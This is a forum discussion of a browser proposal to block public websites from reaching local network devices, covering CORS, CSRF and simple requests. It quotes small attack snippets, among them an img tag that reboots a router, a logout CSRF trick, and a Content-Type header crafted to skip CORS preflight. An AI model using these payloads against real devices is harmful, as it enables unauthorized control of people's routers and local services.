I like this on the first glance. The idea of a random website probing arbitrary local IPs (or any IPs for that matter) with HTTP requests is insane. I wouldn't care if it breaks some enterprise apps or integrations - enterprises could reenable this "feature" via management tools, normal users could configure it themselves, just show a popup "this website wants to control local devices - allow/deny".
This is a misunderstanding. Local network devices are protected from random websites by CORS, and have been for many years. It's not perfect, but it's generally quite effective.
The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
This proposal aims to tighten that, so that even if the website and the network device both actively want to communicate, the user's permission is also explicitly requested. Historically we assumed server & website agreement was sufficient, but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
Doesn't CORS just restrict whether the webpage JS context gets to see the response of the target request? The request itself happens anyway, right?
So the attack vector that I can imagine is that JS on the browser can issue a specially crafted request to a vulnerable printer or whatever that triggers arbitrary code execution on that other device. That code might be sufficient to cause the printer to carry out your evil task, including making an outbound connection to the attacker's server. Of course, the webpage would not be able to discover whether it was successful, but that may not be important.
I think CORS is so hard for us to hold in our heads in large part due to how much is stuffed into the algorithm.
It may send an OPTIONS request, or not.
It may block a request being sent (in response to OPTIONS) or block a response from being read.
It may restrict which headers can be set, or read.
It may downgrade the request you were sending silently, or consider your request valid but the response off limits.
It is a matrix of independent gates essentially.
Even the language we use is imprecise, CORS itself is not really doing any of this or blocking things. As others pointed out it’s the Single Origin Policy that is the strict one, and CORS is really an exception engine to allow us to punch through that security layer.
No, a preflight (OPTIONS) request is sent by the browser first prior to sending the request initiated by the application. I would be surprised if it is possible for the client browser to control this OPTIONS request more than just the URL. I am curious if anyone else has any input on this topic though.
Maybe there is some side-channel timing that can be used to determine the existence of a device, but not so sure about actually crafting and delivering a malicious payload.
This tag:
<img src="http://192.168.1.1/router?reboot=1">
triggers a local network GET request without any CORS involvement. I remember back in the day you could embed <img src="http://someothersite.com/forum/ucp.php?mode=logout"> in your forum signature and screw with everyone's sessions across the web
Haha I remember that. The solution at the time for many forum admins was to simply state that anyone found to be doing that would be permabanned. Which was enough to make it stop completely, at least for the forums that I moderated. Different times indeed.
<img src="C:\con\con"></img>
It's essentially the same, as many apps use HTTP server + html client instead of something native or with another IPC.
Exactly you can also trigger forms for POST or DELETE etc. this is called CSRF if the endpoint doesn't validate some token in the request. CORS only protects against unauthorized xhr requests. All decades old OWASP basics really.
That highly ranked comments on HN (an audience with way above average-engineer interest in software and security) get this wrong kinda explains why these things keep being an issue.
I'm betting HN is vastly more normal people and manager types than people want to admit.
None of us had to pass a security test to post here. There's no filter. That makes it pretty likely that HN's community is exactly as shitty as the rest of the internet's.
People need to stop treating this community like some club of enlightened elites. It's hilariously sad and self-congratulatory.
I don't know why you are getting downvoted, you do have a point. Some of the comments appear knowing what CORS headers are, but neither their purpose nor how it relates to CSRF it seems, which is worrying. It's not meant as disparaging. My university thought a course on OWASP thankfully, otherwise I'll probably also be oblivious.
If you're going cross-domain with XHR, I'd hope you're mostly sending json request bodies and not forms.
Though to be fair, a lot of web frameworks have methods to bind named inputs that allow either.
This misses the point a bit. CSRF usually applies to people who want only same domain requests and dont realize that cross domain is an option for the attacker.
In the modern web its much less of an issue due to samesite cookies being default .
> Exactly you can also trigger forms for POST or DELETE etc
You cant do a DELETE from a form. You have to use ajax. If cross DELETE needs preflight.
To nitpick, CSRF is not the ability to use forms per se, but relying solely on the existence of a cookie to authorize actions with side effects.
This expectation is that this should not work - well behaved network devices shouldn't accept a blind GET like this for destructive operations. Plenty of other good reasons for that. No real alternative unless you're also going to block page redirects & links to these URLs as well, which also trigger a similar GET. That would make it impossible to access any local network page without typing it manually.
While it clearly isn't a hard guarantee, in practice it does seem to generally work as these have been known issues without apparent massive exploits for decades. That CORS restrictions block probing (no response provided) does help makes this all significantly more difficult.
"No true Scotsman allows GETs with side effects" is not a strong argument
It's not just HTTP where this is a problem. There are enough http-ish protocols where protocol smuggling confusion is a risk. It's possible to send chimeric HTTP requests at devices which then interpret them as a protocol other than http.
Yes, which is why web browsers way back even in the netscape navigator era had a blacklist of ports that are disallowed.
The idea is, the malicious actor would use a 'simple request' that doesn't need a preflight (basically, a GET or POST request with form data or plain text), and manage to construct a payload that exploits the target device. But I have yet to see a realistic example of such a payload (the paper I read about the idea only vaguely pointed at the existence of polyglot payloads).
There doesn't need to be any kind of "polyglot payload". Local network services and devices that accept only simple HTTP requests are extremely common. The request will go through and alter state, etc.; you just won't be able to read the response from the browser.
Exactly. People who are answering must not have been aware of “simple” requests not requiring preflight.
I can give an example of this; I found such a vulnerability a few years ago now in an application I use regularly.
The target application in this case was trying to validate incoming POST requests by checking that the incoming MIME type was "application/json". Normally, you can't make unauthorized XHR requests with this MIME type as CORS will send a preflight.
However, because of the way it was checking for this (checking if the Content-Type header contained the text "application/json"), It was relatively easy to construct a new Content-Type header that bypasses CORS:
Content-Type: multipart/form-data; boundary=application/json
It's worth bearing in mind in this case that the payload doesn't actually have to be form data - the application was expecting JSON, after all! As long as the web server doesn't do its own data validation (which it didn't in this case), we can just pass JSON as normal.
This was particularly bad because the application allowed arbitrary code execution via this endpoint! It was fixed, but in my opinion, something like that should never have been exposed to the network in the first place.
Oh, you can only send arbitrary text or form submissions. That’s SO MUCH.
You don't even need to be exploiting the target device, you might just be leaking data over that connection.
Yeah, I think this is the reason this proposal is getting more traction again.
Here's a formal definition of such simple requests, which may be more expansive than one might expect: https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/COR...
Some devices don't bother to limit the size of the GET, which can enable a DOS attack at least, a buffer overflow at worst. But I think the most typical vector is a form-data POST, which isn't CSRF-protected because "it's on localhost so it's safe, right?"
I've been that sloppy with dev servers too. Usually not listening on port 80 but that's hardly Ft Knox.
I think that is because it is so old that its basically old news and mostly mitigated.
https://www.kb.cert.org/vuls/id/476267 is an article from 2001 on it.
It can send a json-rpc request to your bitcoin node and empty your wallet
Do you know of any such node that doesn't check the Content-Type of requests and also has no authentication?
Bitcoin Core if you disable authentication
There's no such thing, short of forking it yourself. You can set the username and password to admin:admin if you want, but Bitcoin Core's JSON-RPC server requires an Authorization header on every request [0], and you can't put an Authorization header on a cross-origin request without a preflight.
[0] https://github.com/bitcoin/bitcoin/blob/v29.0/src/httprpc.cp...
Good to know, I remember you used to be able to disable it via config but looks like I was wrong
You’re forgetting { mode: 'no-cors' }, which makes the response opaque (no way to read the data) but completely bypasses the CORS preflight request and header checks.
This is missing important context. You are correct that preflight will be skipped, but there are further restrictions when operating in this mode. They don't guarantee your server is safe, but it does force operation under a “safer” subset of verbs and header fields.
The browser will restrict the headers and methods of requests that can be sent in no-cors mode. (silent censoring in the case of headers, more specifically)
Anything besides GET, HEAD, POST will result in an error in browser, and not be sent.
All headers will be dropped besides the CORS safelisted headers [0]
And Content-Type must be one of urlencoded, form-data, or text-plain. Attempting to use anything else will see the header replaced by text-plain.
[0] https://developer.mozilla.org/en-US/docs/Glossary/CORS-safel...
That’s just not that big of a restriction. Anecdotally, very few JSON APIs I’ve worked with have bothered to check the request Content-Type. (“Minimal” web frameworks without built-in security middleware have been very harmful in this respect.) People don’t know about this attack vector and don’t design their backends to prevent it.
I agree that it is not a robust safety net. But in the instance you’re citing, thats a misconfigured server.
What framework allows you to setup a misconfigured parser out of the box?
I dont mean that as a challenge, but as a server framework maintainer Im genuinely curious. In express we would definitely allow people to opt into this, but you have to explicitly make the choice to go and configure body-parser.json to accept all content types via a noop function for type checking.
Meaning, its hard to get into this state!
Edit to add: there are myriad ways to misconfigure a webserver to make it insecure without realizing. But IMO that is the point of using a server framework! To make it less likely devs will footgun via sane defaults that prevent these scenarios unless someone really wants to make a different choice.
SvelteKit for sure, and any other JS framework that uses the built-in Request class (which doesn’t check the Content-Type when you call json()).
I don’t know the exact frameworks, but I consume a lot of random undocumented backend APIs (web scraper work) and 95% of the time they’re fine with JSON requests with Content-Type: text/plain.
I think you’re making those restrictions out to be bigger than they are.
Does no-cors allow a nefarious company to send a POST request to a local server, running in an app, containing whatever arbitrary data they’d like? Yes, it does. When you control the server side the inability to set custom headers etc doesn’t really matter.
My intent isnt to convince people this is a safe mode, but to share knowledge in the hope someone learns something new today.
I didnt mean it to come across that way. The spec does what the spec does, we should all be aware of it so we can make informed decisions.
Thankfully no-cors also restricts most headers, including setting content-type to anything but the built-in form types. So while CSRF doesn't even need a click because of no-cors, it's still not possible to do csrf with a json-only api. Just be sure the server is actually set up to restrict the content type -- most frameworks will "helpfully" accept and convert form-data by default.
> No, a preflight (OPTIONS) request is sent by the browser first prior to sending the request initiated by the application.
Note: preflight is not required for any type of request that browser js was capable of making prior to CORS being introduced. (Except for local network)
So a simple GET or POST does not require OPTIONS, but if you set a header it might require OPTIONS (unless its a header you could set in the pre-cors world)
It depends. GET requests are assumed not to have side effects, so often don't have a preflight request (although there are cases where it does). But of course, not all sites follow those semantics, and it wouldn't surprise me if printer or router firmware used GETs to do something dangerous.
Also, form submission famously doesn't require CORS.
There is a limited, but potentially effective, attack surface via URL parameters.
I can confirm that local websites that don't implement CORS via the OPTIONS request cannot be browsed with mainstream browsers. Does nothing to prevent non-browser applications running on the local network from accessing your website.
As far as I can tell, the only thing this proposal does that CORS does not already do is provide some level of enterprise configuration control to guard against the scenario where your users are using compromised internet sites that can ping around your internal network for agents running on compromised desktops. Maybe? I don't get it.
If somebody would fix the "no https for local connections" issue, then IoT websites could use authenticated logins to fix both problems. Non-https websites also have no access to browser crypto APIs so roll-your-own auth (the horror) isn't an option either. Fustrating!
I don't believe this is true? As others have pointed out, preflight options requests only happen for non simple requests. Cors response headers are still required to read a cross domain response, but that is still a huge window for a malicious site to try to send side effectful requests to your local network devices that have some badly implemented web server running.
[edit]: I was wrong. Just tested that a moment ago. It turns out NOT to be true. My web server during normal operation is current NOT getting OPTIONS requests at all.
Wondering whether I triggered CORS requests when I was struggling with IPv6 problems. Or maybe it triggers when I redirect index.html requests from IPv6 to IPv4 addresses. Or maybe I got caught by the earlier roll out of version one of this propposal? There was definitely a time while I was developing pipedal when none of my images displayed because my web server wasn't doing CORS. But. Whatever my excuse might be, I was wrong. :-/
Or simply perform a timing attack as a way of exploring the local network, though I'm not sure if the browser implementation immediately returns after the request is made (ex fetch API is called) but before the response is received. Presumably it doesn't, which would expose it to timing attacks as a way of exploring the network.
eBay, for one, has been (was?) fingerprinting users like this for years.
https://security.stackexchange.com/questions/232345/ebay-web...
Almost every js API for making requests is asynchronous so they do return after the request is made. The exception though is synchronous XHR calls, but I'm not sure if those are still supported
... Anyhow I think it doesn't matter because you can listen for the error/failure of most async requests. Cors errors are equivalent to network errors - the browser tells the js it got stays v code 0 with no further information - but the timing of that could lead to some sort of interference? Hard to say what that would be though. Maybe if you knew the target webserver was slow but would respond to certain requests, a slower failed local request could mean it actually reached a target device.
That said, why not just fire off simple http requests with your intended payload? Abusing the csrf vulnerabilities of local network devices seems far easier than trying to make something out of a timing attack here.
This is also a misunderstanding. CORS only applies to the Layer 7 communication. The rest you can figure out from the timing of that.
Significant components of the browser, such as Websockets have no such restrictions at all
Won't the browser still append the "Origin" field to WebSocket requests, allowing servers to reject them?
yes, and that's exactly how discord's websocket communication checks work (allowing them to offer a non-scheme "open in app" from the website).
they also had some kind of RPC websocket system for game developers, but that appears to have been abandoned: https://discord.com/developers/docs/topics/rpc
A WebSocket starts as a normal http request, so it is subject to cors if the initial request was (eg if it was a post)
CORS doesn’t protect you from anything. Quite the opposite: it _allows_ cross origin communication (provided you follow the spec). The same origin policy is what protects you.
I made a CTF challenge 3 years ago that proves why local devices are not so protected. exploitv99 bypasses PNA with timing as the other commentor points out.
https://github.com/adc/ctf-midnightsun2022quals-writeups/tre...
CORS prevents the site from accessing the response body. In some scenarios, a website could, for example, blindly attempt to authenticate to your router and modify settings by guessing your router bran/model and password
> The issue is that CORS gates access only on the consent of the target server. It must return headers that opt into receiving requests from the website.
False. CORS only gates non-simple requests (via options), simple requests are sent regardless of CORS config, there is no gating whatsoever.
How would Facebook do that? They scan all likely local ranges for what could be your phone, and have a web server running on the phone? That seems more like a problem of allowing the phone app to start something like that and keep it running in the background.
Webrtc allows you to find the local ranges.
Typically there are only 256 IP's, so a scan of them all is almost instant.
Do you have a link talking about those Facebook's recent tricks? I think I missed that story, and would love to read an analysis about it
I think this can be circumvented by DNS rebinding, though your requests won't have the authentication cookies for the target, so you would still need some kind of exploit (or a completely unprotected target).
How? The browser would still have to resolve it to a final IP right?
I'm not sure what you mean but this explains it: https://github.blog/security/application-security/localhost-...
Is this kind of attack actually in scope for this proposal? The explainer doesn't mention it.
> Local network devices are protected from random websites by CORS
C'mon. We all know that 99% of the time, Access-Control-Allow-Origin is set to * and not to the specific IP of the web service.
Also, CORS is not in the control of the user while the proposal is. And that's a huge difference.
> but Facebook's recent tricks where websites secretly talked to apps on your phone have broken that assumption - websites might be in cahoots with local network servers to work against your interests.
This isn't going to help for that. The locally installed app, and the website, can both, independently, open a connection to a 3rd party. There's probably enough fingerprinting available for the 3rd party to be able to match them.
This sounds crazy to me. Why should websites ever have access to the local network? That presents an entirely new threat model for which we don’t have a solution. Is there even a use case for this for which there isn’t already a better solution?
I've used https://pairdrop.net/ before to share files between devices on the same LAN. It obviously wouldn't have to be a website, but it's pretty convenient since all my devices I wanted to share files on already have a browser.
Same use case, but I remember getting approval prompts ( though come to think of it, those were not mandated, but application specific prompts to ensure you consciously choose to share/receive items ). To your point, there are valid use cases for it, but some tightening would likely be beneficial.
Not a local network, but localhost example: due to the lousy private certificate capability APIs in web browsers, this is commonly used for signing with electronic IDs for countries issuing smartcard certificates for their citizens (common in Europe). Basically, a web page would contact a web server hosted on localhost which was integrated with PKCS library locally, providing a signing and encryption API.
One of the solutions in the market was open source up to a point (Nowina NexU), but it seems it's gone from GitHub
For local network, you can imagine similar use cases — keep something inside the local network (eg. an API to an input device; imagine it being a scanner), but enable server-side function (eg. OCR) from their web page. With ZeroConf and DHCP domain name extensions, it can be a pretty seamless option for developers to consider.
>Why should websites ever have access to the local network?
It's just the default. So far, browsers haven't really given different IP ranges different security.
evil.com is allowed to make requests to bank.com . Similarly, evil.com is allowed to make requests to foo.com even if foo.com DNS resolves to 127.0.0.1 .
> It's just the default. So far, browsers haven't really given different IP ranges different security.
I remember having "zone" settings in Internet Explorer 20 years ago, and ISTR it did IP ranges as well as domains. Don't think it did anything about cross-zone security though.
> Is there even a use case for this for which there isn’t already a better solution?
I deal with a third-party hosted webapp that enables extra when a webserver hosted on localhost is present. The local webserver exposes an API allowing the application to interact more closely with the host OS (think locally-attached devices and servers on the local network). If the locally-installed webserver isn't present the hosted app hides the extra functionality.
Limiting browser access to the localhost subnet (127.0.0.1/8) would be fine to me, as a sysadmin, so long as I have the option to enable it for applications where it's desired.
>That presents an entirely new threat model for which we don’t have a solution.
What attack do you think doesn't have a solution? CSRF attacks? The solution is CSRF tokens, or checking the Origin header, same as how non-local-network sites protect against CSRF. DNS rebinding attacks? The solution is checking the Host header.
>for which we don’t have a solution
It's called ZTA, Zero Trust Architecture. Devices shouldn't assume the LAN is secure.
> normal users could configure it themselves, just show a popup "this website wants to control local devices - allow/deny".
MacOS currently does this (per app, not per site) & most users just click yes without a second thought. Doing it per site might create a little more apprehension, but I imagine not much.
Do we have any evidence that most users just click yes?
My parents who are non-technical click no by default to everything, sometimes they ask for my assistance when something doesn't work and often it's because they denied some permission that is essential for an app to work e.g. maybe they denied access to the microphone to an audio call app.
Unless we have statistics, I don't think we can make assumptions.
The amount of "malware" infections I've responded to over the years that involved browser push notifications to Windows desktops is completely absurd. Chrome and Edge clearly ask for permissions to enable a browser push.
The moment a user gets this permissions request, as far as I can tell they will hit approve 100% of the time. We have one office where the staff have complained that it's impossible to look at astrology websites without committing to desktop popups selling McAfee. Which implies those staff, having been trained to hit "no", believe it's impossible to do.
(yes, we can disable with a GPO, which I heavily promote, but that org has political problems).
As a counter example, I think all these dialogs are annoying as hell and click yes to almost everything. If I’m installing the app I have pre-vetted it to ensure it’s marginally trustworthy.
I have no statistics but I wouldn't consider older parents the typical case here. My parents never click yes on anything but my young colleagues in non engineering roles in my office do. And I'd say even a decent % of the engineering colleagues do too - especially the vibe coders. And they all spend a lot more time on they computer then my parents.
Interesting parallel between the older-parents who (may have finally learned to) deny and young folks, supposed digital-natives a majority of which who don’t really understand how computers work.
People accept permission prompts from apps because they conciously downloaded the app and generally have an idea about the developer and what the app does. If a social media app asks for permission to your photos it's easy to understand why, same with a music streamer wanting to connect to your smart speaker.
A random website someone linked me to wanting to access my local network is a very different case. I'm absolutely not giving network or location or camera or any other sort of access to websites except in very extreme circumstances.
"Please accept the [tech word salad] popup to verify your identity"
Maybe this won't fool you, but it would trick 90% of internet users. (And even if it was 20% instead of 90%, that's still way too much.)
I have seen it posed as 'This site has bot protection. Confirm that you are not a bot by clicking yes', trying to mimic the modern Cloudflare / Google captchas.
To be clear: implementing this in browser on a per site basis would be a massive improvement over in-OS/per-app granularity. I want this popup in my browser.
But I was just pointing out that, while I'll make good use of it, it still probably won't offer sufficient protection (from themselves) for most.
I can't believe that anyone still thinks a popup permission modal offers any type of security. Windows UAC has shown quite definitively that users will always click through any modal in their way without thought or comprehension.
Besides that, approximately zero laypersons will have even the slightest clue what this permission means, the risks involved, or why they might want to prevent it. All they know is that the website they want is not working, and the website tells them to enable this or that permission. They will all blindly enable it every single time.
I wonder how much of that is on the modal itself. If we instead popped up an alert that said "blocked an attempt to talk to your local devices, since this is generally a dangerous thing for websites to do. <dismiss>. to change this for this site, go to settings/site-security", making approval a more annoying multi-click deliberate affair, and defaulting the knee-jerk single-click dismissal to the safer option of refusal.
I don't think anyone's under the impression that this is a perfect solution. But it's better than nothing, and the options are this, nothing, or a security barrier that can't be bypassed with a permission prompt. And it was determined that the latter would break too many existing sites that have legitimate (i.e., doing something the end user actively wants) reason to talk to local devices.
I think it does, in many (but definitely not all) contexts.
For example, it's pretty straightforward what camera, push notification, or location access means. Contact sharing is already a stretch ("to connect you with your friends, please grant...").
"Local network access"? Probably not.
Maybe. But eventually they will learn. In the meantime, other users, who at least try to stay somewhat safe ( if it is even possible these days ), can make appropriate adjustments.
This is so true. The modern Mac is a sea of Allow/Don't Allow prompts, mixed with the slightly more infantilizing alternative of the "Block" / "Open System Preferences" where you have to prove you know what you're doing by manually browsing for the app to grant the permission to, to add it to the list of ones with whatever permission.
They're just two different approaches with the same flaw: People with no clue how tech works cannot completely protect themselves from any possible attacker, while also having sophisticated networked features. Nobody has provided a decent alternative other than some kind of fully bubble-wrapped limited account using Group Policies, to ban all those perms from even being asked for.
> The modern Mac is a sea of Allow/Don't Allow prompts
Remember when they used to mock this as part of their marketing?
Windows Vista would spawn a permissions prompt when users did something as innocuous as creating a shortcut on their desktop.
Microsoft deserved to be mocked for that implementation.
MacOS asked a permission dialog when I plug my AirPods in to charge. I have no idea what I’m even giving permission for but it pops up every time.
Asking you if you trust a device before opening a data connection to it is simply not the same thing as asking the person who just created a shortcut if they should be allowed to do that.
How do you know the person created the shortcut and not some malware trying to get a user to click on an executable and elevate permissions?
I once encountered malware on my roommate’s Windows 98 system. It was a worm designed to rewrite every image file as a VBS script that would replicate and re-infect every possible file whenever it was clicked or executed. It hid the VBS extensions and masqueraded as the original images.
Creation of a shortcut on Windows is not necessarily innocuous. It was a common first vector to drop malware as users were accustomed to installing software that did the same thing. A Windows shortcut can hide an arbitrary pathname, arbitrary command-line arguments, a custom icon, and more; these can be modified at any time.
So whether it was a mistake for UAC to be overzealous or obstructionist, or Microsoft was already being mocked for poor security, perhaps they weren’t wrong to raise awareness about such maneuvers.
A user creating a shortcut manually is not something that requires a permissions prompt.
If you want to teach users to ignore security prompts, then completely pointless nagging is how you do it.
Programs running during the user session are often running as that user.
The "correct answer" to this is probably that there isn't a good answer here.
Security is a damn minefield and it's getting worse every day.
There is no universe in which it makes sense to ask the very user who just created a shortcut if they should have permission to create that shortcut.
This is why Microsoft was so widely mocked for just how bad their initial implementation of UAC was.
"iPhone Shortcuts always asks permission to access file"
https://discussions.apple.com/thread/254931245
iOS Shortcut danger
https://cyberpress.org/unveiling-risks-of-ios-shortcuts/
But anywho, cve.org lists 78 shortcut vulnerabilities across many platforms.
I know you'd like to believe the world we live in shouldn't require permissions for a user to create a shortcut and then access it, but that... Is actually the world we live in, and have been in for a very long time.
Security is hard and it's not getting any easier as system complexity increases.
If you don't believe me, ask your favorite LLM. I asked Gemini and got back what I expected to.
And annoyingly, for some reason it does not remember this decision properly. Chrome asks me about local access every few weeks, it seems.
Yes, as a Chromecast user, please do give me a break from the prompts, macOS – or maybe just show them for Airplay with equal frequency and see how your users like that.
problem is: without allowing it webUIs like synology won't work, since they require your browser to connect to the local network... as it is, it's not great
This proposal is for websites outside your network contacting inside your network. I assume local IPs will still work.
Why? I’d guess requests from a local network site to itself (maybe even to others on the same network) will be allowed.
This Web Security lecture by Feross Aboukhadijeh has a great example of Zoom's zero-day from 2019 that allowed anyone to force you to join a zoom meeting (and even cause arbitrary code execution), using a local server:
https://www.youtube.com/watch?v=wLgcb4jZwGM&list=PL1y1iaEtjS...
It's not clear to me from Google's proposal if it also restricts access to localhost, or just your local network - it'd be great if it were both, as we clearly can't rely on third parties to lock down their local servers sufficiently!
edit: localhost won't be restricted:
"Note that local -> local is not a local network request, as well as loopback -> anything. (See "cross-origin requests" below for a discussion on potentially expanding this definition in the future.)"
>edit: localhost won't be restricted:
It will be restricted. This proposal isn't completely blocking all localhost and local IPs. Rather, it's preventing public sites from communicating with localhost and local IPs. E.g:
* If evil.com makes a request to a local address it'll get blocked.
* If evil.com makes a request to a localhost address it'll get blocked.
* If a local address makes a request to a localhost address it'll get blocked.
* If a local address makes a request to a local address, it'll be allowed.
* If a local address makes a request to evil.com it'll be allowed.
* If localhost makes a request to a localhost address it'll be allowed.
* If localhost makes a request to a local address, it'll be allowed.
* If localhost makes a request to evil.com it'll be allowed.
Ahh, thanks for clarifying! It's the origin being compared, not the context - of course.